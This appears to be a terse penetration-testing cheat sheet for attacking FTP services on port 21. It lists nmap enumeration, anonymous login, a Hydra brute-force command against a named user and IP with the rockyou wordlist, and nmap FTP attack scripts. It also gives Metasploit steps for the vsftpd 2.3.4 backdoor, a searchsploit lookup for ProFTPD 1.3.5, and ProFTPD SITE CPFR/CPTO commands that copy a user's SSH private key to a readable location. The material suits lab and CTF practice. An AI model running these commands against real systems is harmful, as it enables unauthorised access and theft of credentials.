Port 21 - ftp
Nmap
nmap -p 21 -A $(target)
Anonymous login
lftp $(target)
ftp $(target)
> anonymous
> anonymous
Bruteforce - Hydra
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.227.75 ftp
Nmap script for ftp
find / -name *.nse 2>/dev/null | grep 'ftp' | tee nmap.script
> ftp-syst.nse
> tftp-enum.nse
> ftp-libopie.nse
> ftp-anon.nse
> ftp-vuln-cve2010-4221.nse
> ftp-proftpd-backdoor.nse
> ftp-bounce.nse
> ftp-brute.nse
> ftp-vsftpd-backdoor.nse
nmap -p 21 --script=ftp-* $(target)
nmap -p 21 --script=ftp-anon.nse $(target)
Exploit
ProFtpd
searchsploit proftpd 1.3.5
VsFtpd 2.3.4
msf> use exploit/unix/ftp/vsftpd\_234\_backdoor
msf> show options
msf> set RHOST 192.168.0.101
msf> show options
msf> exploit
FTP Copy & Past
SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa.pub
SITE CPTO /var/tmp/id_rsa.pub